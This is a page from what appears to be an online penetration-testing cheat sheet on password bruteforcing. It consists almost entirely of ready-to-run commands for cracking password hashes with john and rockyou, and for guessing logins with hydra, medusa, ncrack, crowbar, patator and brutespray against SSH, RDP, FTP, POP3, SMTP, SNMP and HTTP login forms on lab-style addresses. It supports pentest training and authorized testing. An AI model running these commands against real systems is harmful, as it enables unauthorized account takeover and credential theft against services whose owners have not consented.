Pentest Book
Search…
Bruteforcing
1
cewl
2
hash-identifier
3
# https://github.com/HashPals/Name-That-Hash
4
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
5
medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
6
ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
7
crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
8
patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422'
9
hydra -l root -P password-file.txt 10.11.1.111 ssh
10
hydra -P password-file.txt -v 10.11.1.111 snmp
11
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
12
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
13
hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V
14
hydra -L username.txt -p paswordl33t -t 4 ssh://10.10.1.111
15
hydra -L user.txt -P pass.txt 10.10.1.111 ftp
16
17
# PATATOR
18
patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422'
19
20
# SIMPLE LOGIN GET
21
hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
22
23
# GET FORM with HTTPS
24
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
25
26
# SIMPLE LOGIN POST
27
hydra -l [email protected] -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
28
29
# API REST LOGIN POST
30
hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64
31
32
# Password spraying bruteforcer
33
# https://github.com/x90skysn3k/brutespray
34
python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5
35
36
# Password generator
37
# https://github.com/edoardottt/longtongue
38
python3 longtongue.py
Copied!
Last modified 8mo ago
Export as PDF
Copy link